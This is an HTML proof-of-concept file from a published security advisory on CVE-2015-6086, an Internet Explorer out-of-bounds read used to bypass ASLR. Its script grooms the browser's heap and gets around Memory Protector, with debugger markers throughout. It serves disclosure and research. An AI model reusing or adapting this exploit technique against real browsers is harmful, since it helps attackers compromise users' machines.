<!--

                      CVE-2015-6086
             Out Of Bound Read Vulnerability
     Address Space Layout Randomization (ASLR) Bypass

Improper handling of new line and white space character caused
Out of Bound Read in CDOMStringDataList::InitFromString. This
flaw can be used to leak the base address of MSHTML.DLL and
effectively bypass Address Space Layout Randomization.

Affected Version:
        Internet Explorer 9
        Internet Explorer 10
        Internet Explorer 11

Test Bed:
        IE: 10 & 11
        KB: KB3087038
        OS: Windows 7 SP1 x86

Advisory:
        http://www.payatu.com/advisory-ie_cdomstringdatalist/
        https://technet.microsoft.com/library/security/MS15-112
        http://www.zerodayinitiative.com/advisories/ZDI-15-547/

Copyright 2016 © Payatu Technologies Pvt. Ltd.

Author: Ashfaq Ansari
Email: ashfaq[at]payatu[dot]com
Websites: www.payatu.com
          www.nullcon.net
          www.hardwear.io
          www.null.co.in

This program is free software: you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by the
Free Software Foundation, either version 3 of the License, or (at your
option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT
ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with
this program.  If not, see <http://www.gnu.org/licenses/>.

THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
PARTICULAR PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
-->

<!DOCTYPE html>
<html>
<head>
    <title>LFH PoC Memory Protector Enabled</title>
    <meta http-equiv='Cache-Control' content='no-cache'/>
    <meta http-equiv="expires" content="0"/>
    <script>
        function CollectGarbage2() {
            // Microsoft implemented Memory Protector to mitigate
            // Use after Free vulnerabilities. The object protected
            // by Memory Protector won't be freed directly. Instead,
            // it will be put into a wait list which will be freed
            // when it reaches certain threshold (i.e 100,000 bytes).
            var video = new Array();

            // Now allocate video element (400 bytes) 250 times
            // Note: We are not using stack to store the references.
            // If we use stack to store the references, the memory
            // will never be freed during Mark and Reclaim operation
            for (var i = 0; i < 250; i++) {
                video[i] = document.createElement("video");
            }

            // Now free the elements. It will be put into the wait list.
            video = null;

            // Reclaim the memory
            CollectGarbage();
        }

        function triggerLowFragmentationHeap() {
            alert("Attach the debugger\nSet the break points");

            var eventArray = new Array();

            Math.atan2(0xdeadbeef, "Creating MsGestureEvent");
            for (var i = 0; i < 0x12; i++) {
                eventArray[i] = document.createEvent("MsGestureEvent");
                Math.atan2(0xdeadbeef, "Creating MsGestureEvent Count");
            }
            Math.atan2(0xdeadbeef, "Creating MsGestureEvent Completed");

            Math.atan2(0xdeadbeef, "Destroying MsGestureEvent");
            for (i = 0; i < 0x1; i++) {
                eventArray[eventArray.length - 2] = null;
                Math.atan2(0xdeadbeef, "Destroying MsGestureEvent Count");
            }
            Math.atan2(0xdeadbeef, "Collecting Garbage");
            CollectGarbage();
            CollectGarbage2();
            Math.atan2(0xdeadbeef, "Collecting Garbage Completed");
            Math.atan2(0xdeadbeef, "Destroying MsGestureEvent Completed");

            Math.atan2(0xdeadbeef, "Reallocating MsGestureEvent");
            for (i = 0; i < 0x1; i++) {
                eventArray[eventArray.length - 2] = document.createEvent("MsGestureEvent");
                Math.atan2(0xdeadbeef, "Reallocating MsGestureEvent Count");
            }
            Math.atan2(0xdeadbeef, "Reallocating MsGestureEvent Completed");
        }
    </script>
</head>
<body onload='triggerLowFragmentationHeap();'></body>
</html>